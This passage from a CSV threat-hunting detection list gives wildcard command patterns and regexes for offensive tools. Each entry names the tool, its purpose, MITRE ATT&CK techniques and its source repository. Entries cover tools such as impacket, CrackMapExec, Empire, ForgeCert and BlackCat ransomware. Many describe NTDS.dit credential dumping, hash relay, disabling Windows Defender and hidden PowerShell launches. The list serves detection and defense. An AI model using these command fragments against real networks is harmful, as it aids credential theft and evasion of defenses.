T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --NewCertPath *.pfx --NewCertPassword *",".{0,1000}\s\-\-NewCertPath\s.{0,1000}\.pfx\s\-\-NewCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* 
NewLocalAdmin(*",".{0,1000}\sNewLocalAdmin\(.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* nexpose-brute.nse*",".{0,1000}\snexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nfs-ls.nse*",".{0,1000}\snfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nfs-showmount.nse*",".{0,1000}\snfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nfs-statfs.nse*",".{0,1000}\snfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NiceRAT.py*",".{0,1000}\sNiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "* nightCrawler.ps1*",".{0,1000}\snightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* nikto.pl *",".{0,1000}\snikto\.pl\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "* nimcrypt*",".{0,1000}\snimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE 
Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "* Ninja.py*",".{0,1000}\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "* nje-node-brute.nse*",".{0,1000}\snje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nje-pass-brute.nse*",".{0,1000}\snje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --nla-redirection-host * --nla-redirection-port *",".{0,1000}\s\-\-nla\-redirection\-host\s.{0,1000}\s\-\-nla\-redirection\-port\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "* nntp-ntlm-info.nse*",".{0,1000}\snntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NoAmsi.ps1*",".{0,1000}\sNoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -NoBase64 *",".{0,1000}\s\-NoBase64\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --no-bruteforce 
--continue-on-success*",".{0,1000}\s\-\-no\-bruteforce\s\-\-continue\-on\-success.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --no-http-server -smb2support -t * -c *",".{0,1000}\s\-\-no\-http\-server\s\-smb2support\s\-t\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --nomain -d:exportDll --passL:*",".{0,1000}\s\-\-nomain\s\-d\:exportDll\s\-\-passL\:.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "* -NoP -sta -NonI -W Hidden -Enc *",".{0,1000}\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Enc\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - 
T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* -no-pass -dns-tcp -nameserver*",".{0,1000}\s\-no\-pass\s\-dns\-tcp\s\-nameserver.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* -no-pass -just-dc-user *",".{0,1000}\s\-no\-pass\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -no-pass rid-hijack*",".{0,1000}\s\-no\-pass\srid\-hijack.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral 
Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* -no-pass -usersfile *",".{0,1000}\s\-no\-pass\s\-usersfile\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* NoPowerShell.*",".{0,1000}\sNoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth 
Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "* No-PowerShell.cs*",".{0,1000}\sNo\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "* --no-ppid-spoof*",".{0,1000}\s\-\-no\-ppid\-spoof.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -no-preauth * -dc-ip *",".{0,1000}\s\-no\-preauth\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -NoPRo -wIN 1 -nONi -eN Sh33L*",".{0,1000}\s\-NoPRo\s\-wIN\s1\s\-nONi\s\-eN\sSh33L.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "* 
norouteconfig.sh*",".{0,1000}\snorouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* --no-sigthief*",".{0,1000}\s\-\-no\-sigthief.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -notcontains * -notlike ""ntuser.dat*"" -and $_.Extension -ne "".tm*",".{0,1000}\s\-notcontains\s.{0,1000}\s\-notlike\s\""ntuser\.dat.{0,1000}\""\s\-and\s\$_\.Extension\s\-ne\s\""\.tm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* --no-vm-kill*",".{0,1000}\s\-\-no\-vm\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --no-vm-snapshot-kill*",".{0,1000}\s\-\-no\-vm\-snapshot\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nping-brute.nse*",".{0,1000}\snping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nrpe-enum.nse*",".{0,1000}\snrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* NtCr3at3Thr3adEx @ *",".{0,1000}\sNtCr3at3Thr3adEx\s\@\s.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "* 
ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -ntds *.dit *-system *",".{0,1000}\s\-ntds\s.{0,1000}\.dit\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -ntds NTDS.dit -filters*",".{0,1000}\s\-ntds\sNTDS\.dit\s\s\-filters.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "* -ntds ntds.dit -system SYSTEM *",".{0,1000}\s\-ntds\sntds\.dit\s\-system\sSYSTEM\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Credential Access","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -ntds NTDS.dit -system SYSTEM -outputdir /*",".{0,1000}\s\-ntds\sNTDS\.dit\s\-system\sSYSTEM\s\-outputdir\s\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "* -ntds ntds.dit.save -system system.save LOCAL*",".{0,1000}\s\-ntds\sntds\.dit\.save\s\-system\ssystem\.save\sLOCAL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --ntds-history*",".{0,1000}\s\-\-ntds\-history.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --ntds-pwdLastSet*",".{0,1000}\s\-\-ntds\-pwdLastSet.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -nthash * -domain-sid *",".{0,1000}\s\-nthash\s.{0,1000}\s\-domain\-sid\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - 